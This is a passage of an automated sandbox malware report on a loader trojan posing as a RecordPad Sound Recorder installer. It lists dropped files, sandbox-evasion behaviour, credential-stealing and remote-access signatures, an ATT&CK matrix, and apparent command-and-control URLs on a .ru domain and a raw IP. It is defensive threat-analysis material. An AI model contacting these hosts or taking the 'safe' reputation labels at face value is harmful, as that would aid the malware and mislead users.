Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exe | Code function: 3_2_00401B4B LoadLibraryA,GetProcAddress,GetAdaptersInfo,FreeLibrary
Source: C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exe | Code function: 4_2_00401B4B LoadLibraryA,GetProcAddress,GetAdaptersInfo,FreeLibrary
Source: C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exe | Code function: 4_2_0260F955 LoadLibraryA,GetProcAddress,GetAdaptersInfo,FreeLibrary
Source: C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exe | Window / User API: threadDelayed 9765
Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\RecordPad Sound Recorder\is-RV2D1.tmp
Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\RecordPad Sound Recorder\is-6P98M.tmp
Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-NO26A.tmp\_isetup\_shfoldr.dll
Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\RecordPad Sound Recorder\Qt5Xml.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\RecordPad Sound Recorder\Qt5WinExtras.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\RecordPad Sound Recorder\avdevice-58.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\RecordPad Sound Recorder\is-PRP4U.tmp
Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\RecordPad Sound Recorder\is-C4R5U.tmp
Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\RecordPad Sound Recorder\libmp3lame.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\RecordPad Sound Recorder\Qt5OpenGL.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\RecordPad Sound Recorder\openh264.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\RecordPad Sound Recorder\is-O2PKH.tmp
Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\RecordPad Sound Recorder\msvcr120.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\RecordPad Sound Recorder\is-FR4FM.tmp
Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\RecordPad Sound Recorder\libeay32.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\RecordPad Sound Recorder\unins000.exe (copy)
Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\RecordPad Sound Recorder\is-UTKLG.tmp
Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-NO26A.tmp\_isetup\_setup64.tmp
Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-NO26A.tmp\_isetup\_RegDLL.tmp
Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\RecordPad Sound Recorder\msvcp120.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\RecordPad Sound Recorder\libcurl.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\RecordPad Sound Recorder\is-0C056.tmp
Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\RecordPad Sound Recorder\is-K3HBS.tmp
Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\RecordPad Sound Recorder\is-KU10K.tmp
Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\RecordPad Sound Recorder\msvcp140.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\RecordPad Sound Recorder\is-KI2RB.tmp
Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\RecordPad Sound Recorder\is-8ECK7.tmp
Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\RecordPad Sound Recorder\is-VDBC5.tmp
Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\RecordPad Sound Recorder\is-EAHN0.tmp
Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\RecordPad Sound Recorder\is-UCHQL.tmp
Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\RecordPad Sound Recorder\msvcp140_1.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-NO26A.tmp\_isetup\_iscrypt.dll
Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\RecordPad Sound Recorder\is-JNDNQ.tmp
Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\RecordPad Sound Recorder\Qt5Svg.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\RecordPad Sound Recorder\mousehelper.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\RecordPad Sound Recorder\QtAVWidgets1.dll (copy)
Source: C:\Users\user\Desktop\tOniaJ21lj.exe | Evasive API call chain: GetSystemTime,DecisionNodes graph_0-6440
Source: C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exe | Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess graph_3-3206
Source: C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exe TID: 2788 | Thread sleep count: 131 > 30
Source: C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exe TID: 2788 | Thread sleep time: -262000s >= -30000s
Source: C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exe TID: 760 | Thread sleep count: 42 > 30
Source: C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exe TID: 760 | Thread sleep time: -2520000s >= -30000s
Source: C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exe TID: 2788 | Thread sleep count: 9765 > 30
Source: C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exe TID: 2788 | Thread sleep time: -19530000s >= -30000s
Source: C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exe | File opened: PhysicalDrive0
Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp | Code function: 1_2_0047A964 FindFirstFileA,FindNextFileA,FindClose,FindFirstFileA,FindNextFileA,FindClose
Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp | Code function: 1_2_00470C84 FindFirstFileA,FindNextFileA,FindClose
Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp | Code function: 1_2_00451668 FindFirstFileA,GetLastError
Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp | Code function: 1_2_00460594 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode
Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp | Code function: 1_2_00492760 FindFirstFileA,SetFileAttributesA,FindNextFileA,FindClose
Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp | Code function: 1_2_0047884C FindFirstFileA,FindNextFileA,FindClose,FindFirstFileA,FindNextFileA,FindClose
Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp | Code function: 1_2_00460A10 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode
Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp | Code function: 1_2_0045F008 FindFirstFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\tOniaJ21lj.exe | Code function: 0_2_00409A14 GetSystemInfo,VirtualQuery,VirtualProtect,VirtualProtect,VirtualQuery
Source: C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exe | Thread delayed: delay time: 60000
Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp | File opened: C:\Users\user
Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp | File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp | File opened: C:\Users\user\AppData\Roaming
Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp | File opened: C:\Users\user\AppData
Source: tOniaJ21lj.tmp, 00000001.00000002.3269392528.0000000000669000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: recordpadsoundrecorder32.exe, 00000004.00000002.3270365274.0000000003310000.00000004.00000020.00020000.00000000.sdmp, recordpadsoundrecorder32.exe, 00000004.00000002.3269409364.0000000000878000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: C:\Users\user\Desktop\tOniaJ21lj.exe | API call chain: ExitProcess graph end node graph_0-6298
Source: C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exe | API call chain: ExitProcess graph end node graph_3-3468
Source: C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exe | Code function: 4_2_0262016E RtlEncodePointer,RtlEncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,IsDebuggerPresent,OutputDebugStringW,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer
Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp | Code function: 1_2_00447F60 LoadLibraryExA,LoadLibraryA,GetProcAddress
Source: C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exe | Code function: 4_2_02606487 RtlInitializeCriticalSection,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetTickCount,GetVersionExA,_memset,_malloc,_malloc,_malloc,_malloc,_malloc,_malloc,_malloc,_malloc,GetProcessHeap,GetProcessHeap,RtlAllocateHeap,RtlAllocateHeap,GetProcessHeap,RtlAllocateHeap,GetProcessHeap,RtlAllocateHeap,_memset,_memset,_memset,RtlEnterCriticalSection,RtlLeaveCriticalSection,_malloc,_malloc,_malloc,_malloc,QueryPerformanceCounter,Sleep,_malloc,_malloc,_memset,_memset,Sleep,RtlEnterCriticalSection,RtlLeaveCriticalSection,_memset,_memset
Source: C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exe | Code function: 4_2_026194D8 SetUnhandledExceptionFilter,UnhandledExceptionFilter
Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp | Code function: 1_2_004739C4 ShellExecuteEx,GetLastError,MsgWaitForMultipleObjects,GetExitCodeProcess,CloseHandle
Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp | Code function: 1_2_0045B29C GetVersion,GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,AllocateAndInitializeSid,GetLastError,LocalFree
Source: C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exe | Code function: 4_2_0260F809 cpuid
Source: C:\Users\user\Desktop\tOniaJ21lj.exe | Code function: 0_2_0040515C GetLocaleInfoA
Source: C:\Users\user\Desktop\tOniaJ21lj.exe | Code function: 0_2_004051A8 GetLocaleInfoA
Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp | Code function: 1_2_004084D0 GetLocaleInfoA
Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp | Code function: 1_2_0040851C GetLocaleInfoA
Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp | Code function: 1_2_00456D8C GetTickCount,QueryPerformanceCounter,GetSystemTimeAsFileTime,GetCurrentProcessId,CreateNamedPipeA,GetLastError,CreateFileA,SetNamedPipeHandleState,CreateProcessA,CloseHandle,CloseHandle
Source: C:\Users\user\Desktop\tOniaJ21lj.exe | Code function: 0_2_004026C4 GetSystemTime
Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp | Code function: 1_2_00453F88 GetUserNameA
Source: C:\Users\user\Desktop\tOniaJ21lj.exe | Code function: 0_2_00405C44 GetVersionExA

Stealing of Sensitive Information

Source: Yara match | File source: 00000004.00000002.3270097670.0000000002601000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.3269669582.000000000097E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: recordpadsoundrecorder32.exe PID: 1412, type: MEMORYSTR

Remote Access Functionality

Source: Yara match | File source: 00000004.00000002.3270097670.0000000002601000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.3269669582.000000000097E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: recordpadsoundrecorder32.exe PID: 1412, type: MEMORYSTR
                      MITRE ATT&CK matrix (techniques per tactic; where the report shows a count for a technique it is given in parentheses)
                      Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology; IP Addresses
                      Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising; Compromise Infrastructure
                      Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application; Supply Chain Compromise
                      Execution: Native API (3); Service Execution (2); At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter; PowerShell
                      Persistence: DLL Side-Loading (1); Windows Service (4); Bootkit (1); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At; Cron
                      Privilege Escalation: Exploitation for Privilege Escalation (1); DLL Side-Loading (1); Access Token Manipulation (1); Windows Service (4); Process Injection (2); RC Scripts; Startup Items; Scheduled Task/Job; At; Cron
                      Defense Evasion: Deobfuscate/Decode Files or Information (1); Obfuscated Files or Information (3); Software Packing (22); DLL Side-Loading (1); Masquerading (1); Virtualization/Sandbox Evasion (21); Access Token Manipulation (1); Process Injection (2); Bootkit (1); Dynamic API Resolution
                      Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow; Network Sniffing
                      Discovery: System Time Discovery (1); Account Discovery (1); File and Directory Discovery (3); System Information Discovery (35); Security Software Discovery (141); Virtualization/Sandbox Evasion (21); Application Window Discovery (11); System Owner/User Discovery (3); Remote System Discovery (1); System Network Configuration Discovery (1)
                      Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections; Shared Webroot
                      Collection: Archive Collected Data (11); Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged; Local Data Staging
                      Command and Control: Ingress Tool Transfer (2); Encrypted Channel (2); Non-Standard Port (1); Non-Application Layer Protocol (2); Application Layer Protocol (112); Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols; File Transfer Protocols
                      Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol
                      Impact: System Shutdown/Reboot (1); Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement; External Defacement

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet

                      Antivirus results for the submitted sample
                      Source | Detection | Scanner | Label
                      tOniaJ21lj.exe | 21% | ReversingLabs | Win32.Trojan.Privateloader
                      tOniaJ21lj.exe | 100% | Avira | HEUR/AGEN.1332570
                      Antivirus results for dropped files
                      Source | Detection | Scanner | Label
                      C:\Users\user\AppData\Local\RecordPad Sound Recorder\is-UCHQL.tmp | 100% | Avira | ADWARE/AVI.ICLoader.jwrbl
                      C:\ProgramData\UID Finder 6.11.66\UID Finder 6.11.66.exe | 100% | Avira | HEUR/AGEN.1314993
                      C:\Users\user\AppData\Local\RecordPad Sound Recorder\is-UCHQL.tmp | 100% | Joe Sandbox ML |
                      C:\ProgramData\UID Finder 6.11.66\UID Finder 6.11.66.exe | 100% | Joe Sandbox ML |
                      C:\ProgramData\UID Finder 6.11.66\UID Finder 6.11.66.exe | 42% | ReversingLabs | Win32.Trojan.Generic
                      C:\Users\user\AppData\Local\RecordPad Sound Recorder\Qt5OpenGL.dll (copy) | 0% | ReversingLabs |
                      C:\Users\user\AppData\Local\RecordPad Sound Recorder\Qt5Svg.dll (copy) | 0% | ReversingLabs |
                      C:\Users\user\AppData\Local\RecordPad Sound Recorder\Qt5WinExtras.dll (copy) | 0% | ReversingLabs |
                      C:\Users\user\AppData\Local\RecordPad Sound Recorder\Qt5Xml.dll (copy) | 0% | ReversingLabs |
                      C:\Users\user\AppData\Local\RecordPad Sound Recorder\QtAVWidgets1.dll (copy) | 0% | ReversingLabs |
                      C:\Users\user\AppData\Local\RecordPad Sound Recorder\avdevice-58.dll (copy) | 0% | ReversingLabs |
                      C:\Users\user\AppData\Local\RecordPad Sound Recorder\is-0C056.tmp | 0% | ReversingLabs |
                      C:\Users\user\AppData\Local\RecordPad Sound Recorder\is-6P98M.tmp | 0% | ReversingLabs |
                      C:\Users\user\AppData\Local\RecordPad Sound Recorder\is-8ECK7.tmp | 0% | ReversingLabs |
                      C:\Users\user\AppData\Local\RecordPad Sound Recorder\is-C4R5U.tmp | 0% | ReversingLabs |
                      C:\Users\user\AppData\Local\RecordPad Sound Recorder\is-EAHN0.tmp | 0% | ReversingLabs |
                      C:\Users\user\AppData\Local\RecordPad Sound Recorder\is-FR4FM.tmp | 0% | ReversingLabs |
                      C:\Users\user\AppData\Local\RecordPad Sound Recorder\is-JNDNQ.tmp | 0% | ReversingLabs |
                      C:\Users\user\AppData\Local\RecordPad Sound Recorder\is-K3HBS.tmp | 0% | ReversingLabs |
                      C:\Users\user\AppData\Local\RecordPad Sound Recorder\is-KI2RB.tmp | 0% | ReversingLabs |
                      C:\Users\user\AppData\Local\RecordPad Sound Recorder\is-KU10K.tmp | 0% | ReversingLabs |
                      C:\Users\user\AppData\Local\RecordPad Sound Recorder\is-O2PKH.tmp | 3% | ReversingLabs |
                      C:\Users\user\AppData\Local\RecordPad Sound Recorder\is-PRP4U.tmp | 0% | ReversingLabs |
                      C:\Users\user\AppData\Local\RecordPad Sound Recorder\is-RV2D1.tmp | 0% | ReversingLabs |
                      C:\Users\user\AppData\Local\RecordPad Sound Recorder\is-UCHQL.tmp | 88% | ReversingLabs | Win32.PUA.IcLoader
                      C:\Users\user\AppData\Local\RecordPad Sound Recorder\is-UTKLG.tmp | 0% | ReversingLabs |
                      C:\Users\user\AppData\Local\RecordPad Sound Recorder\is-VDBC5.tmp | 0% | ReversingLabs |
                      C:\Users\user\AppData\Local\RecordPad Sound Recorder\libcurl.dll (copy) | 0% | ReversingLabs |
                      C:\Users\user\AppData\Local\RecordPad Sound Recorder\libeay32.dll (copy) | 88% | ReversingLabs | Win32.PUA.IcLoader
                      C:\Users\user\AppData\Local\RecordPad Sound Recorder\libmp3lame.dll (copy) | 0% | ReversingLabs |
                      C:\Users\user\AppData\Local\RecordPad Sound Recorder\mousehelper.dll (copy) | 0% | ReversingLabs |
                      C:\Users\user\AppData\Local\RecordPad Sound Recorder\msvcp120.dll (copy) | 0% | ReversingLabs |
                      C:\Users\user\AppData\Local\RecordPad Sound Recorder\msvcp140.dll (copy) | 0% | ReversingLabs |
                      C:\Users\user\AppData\Local\RecordPad Sound Recorder\msvcp140_1.dll (copy) | 0% | ReversingLabs |
                      C:\Users\user\AppData\Local\RecordPad Sound Recorder\msvcr120.dll (copy) | 0% | ReversingLabs |
                      C:\Users\user\AppData\Local\RecordPad Sound Recorder\openh264.dll (copy) | 0% | ReversingLabs |
                      C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exe | 42% | ReversingLabs | Win32.Trojan.Generic
                      C:\Users\user\AppData\Local\RecordPad Sound Recorder\unins000.exe (copy) | 3% | ReversingLabs |
                      C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp | 3% | ReversingLabs |
                      C:\Users\user\AppData\Local\Temp\is-NO26A.tmp\_isetup\_RegDLL.tmp | 0% | ReversingLabs |
                      C:\Users\user\AppData\Local\Temp\is-NO26A.tmp\_isetup\_iscrypt.dll | 0% | ReversingLabs |
                      C:\Users\user\AppData\Local\Temp\is-NO26A.tmp\_isetup\_setup64.tmp | 0% | ReversingLabs |
                      C:\Users\user\AppData\Local\Temp\is-NO26A.tmp\_isetup\_shfoldr.dll | 0% | ReversingLabs |
                      No Antivirus matches
                      No Antivirus matches
                      Antivirus results for URLs
                      Source | Detection | Scanner | Label
                      https://sectigo.com/CPS0 | 0% | URL Reputation | safe
                      http://ocsp.sectigo.com0 | 0% | URL Reputation | safe
                      http://ocsp.thawte.com0 | 0% | URL Reputation | safe
                      http://xml.org/sax/features/namespaceshttp://xml.org/sax/features/namespace-prefixeshttp://trolltech | 0% | Avira URL Cloud | safe
                      http://lame.sf.net32bits64bits | 0% | Avira URL Cloud | safe
                      http://qt-project.org/xml/features/report-whitespace-only-CharData | 0% | Avira URL Cloud | safe
                      http://ocsps.ssl.com0? | 0% | Avira URL Cloud | safe
                      aaxeeeo.ru | 0% | Avira URL Cloud | safe
                      http://www.innosetup.com/ | 0% | Avira URL Cloud | safe
                      http://cert.ssl.com/SSLcom-SubCA-CodeSigning-RSA-4096-R1.cer0 | 0% | Avira URL Cloud | safe
                      http://www.ssl.com/repository/SSLcomRootCertificationAuthorityRSA.crt0 | 0% | Avira URL Cloud | safe
                      http://xml.org/sax/features/namespaces | 0% | Avira URL Cloud | safe
                      http://aaxeeeo.ru/search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c645db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ff710c2e8929d3d | 0% | Avira URL Cloud | safe
                      http://cert.ssl.com/SSL.com-timeStamping-I-RSA-R1.cer0Q | 0% | Avira URL Cloud | safe
                      http://94.156.8.14/search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d | 0% | Avira URL Cloud | safe
                      http://xml.org/sax/features/namespace-prefixes | 0% | Avira URL Cloud | safe
                      http://ocsps.ssl.com0 | 0% | Avira URL Cloud | safe
                      http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s | 0% | Avira URL Cloud | safe
                      http://lame.sf.netB | 0% | Avira URL Cloud | safe
                      http://qtav.org2 | 0% | Avira URL Cloud | safe
                      http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0# | 0% | Avira URL Cloud | safe
                      https://curl.haxx.se/docs/http-cookies.html | 0% | Avira URL Cloud | safe
                      http://94.156.8.14/search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f8 | 0% | Avira URL Cloud | safe
                      http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t | 0% | Avira URL Cloud | safe
                      http://www.remobjects.com/psU | 0% | Avira URL Cloud | safe
                      http://crls.ssl.com/SSL.com-timeStamping-I-RSA-R1.crl0 | 0% | Avira URL Cloud | safe
                      http://lame.sf.net | 0% | Avira URL Cloud | safe
                      http://crls.ssl.com/ssl.com-rsa-RootCA.crl0 | 0% | Avira URL Cloud | safe
                      http://crl.thawte.com/ThawteTimestampingCA.crl0 | 0% | Avira URL Cloud | safe
                      https://www.thawte.com/cps0/ | 0% | Avira URL Cloud | safe
                      http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0# | 0% | Avira URL Cloud | safe
                      https://www.thawte.com/repository0W | 0% | Avira URL Cloud | safe
                      http://qt-project.org/xml/features/report-start-end-entity | 0% | Avira URL Cloud | safe
                      https://curl.haxx.se/docs/copyright.htmlD | 0% | Avira URL Cloud | safe
                      http://aaxeeeo.ru/search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110 | 0% | Avira URL Cloud | safe
                      https://www.ssl.com/repository0 | 0% | Avira URL Cloud | safe
                      https://curl.haxx.se/V | 0% | Avira URL Cloud | safe
